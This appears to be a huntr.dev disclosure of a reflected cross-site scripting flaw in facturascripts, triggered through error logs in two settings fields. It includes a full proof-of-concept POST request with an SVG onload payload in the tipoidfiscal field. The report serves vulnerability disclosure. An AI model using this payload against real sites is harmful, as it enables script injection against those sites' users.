Lucene search

K
huntrIohehe5FA17E9B-C767-46B4-AF64-AAFB8C2AA521
HistoryJun 04, 2022 - 1:03 p.m.

Cross-site scripting - Reflected XSS caused by error logs in neorazorx/facturascripts

2022-06-0413:03:56
iohehe
www.huntr.dev
21

0.001 Low

EPSS

Percentile

21.6%

Description

There are two fields that can insert the XSS payload by the error log.

  1. http://127.0.0.1/facturascripts/EditBalance, the codbalance field
  2. http://127.0.0.1/facturascripts/EditSettings, the tipoidfiscal field in Fiscal Id

Both fields require 1 and 25 numbers or letters, no spaces, accents or any other character.. So we can not store the payload, but we can trigger a reflected XSS via the error log.

Proof of Concept

POST /facturascripts/EditSettings HTTP/1.1
Host: 127.0.0.1
...
------WebKitFormBoundaryYIfWjQXpEB2jLexN
Content-Disposition: form-data; name="action"

edit
------WebKitFormBoundaryYIfWjQXpEB2jLexN
Content-Disposition: form-data; name="activetab"

EditIdentificadorFiscal
------WebKitFormBoundaryYIfWjQXpEB2jLexN
Content-Disposition: form-data; name="code"

CI
------WebKitFormBoundaryYIfWjQXpEB2jLexN
Content-Disposition: form-data; name="multireqtoken"

61893af8ff1671201dcbeaff4d052cf544c4de1e|MvOEut
------WebKitFormBoundaryYIfWjQXpEB2jLexN
Content-Disposition: form-data; name="tipoidfiscal"

CI<svg/onload='alert(/xss/);'>
------WebKitFormBoundaryYIfWjQXpEB2jLexN
Content-Disposition: form-data; name="codeid"


------WebKitFormBoundaryYIfWjQXpEB2jLexN--

0.001 Low

EPSS

Percentile

21.6%

Related for 5FA17E9B-C767-46B4-AF64-AAFB8C2AA521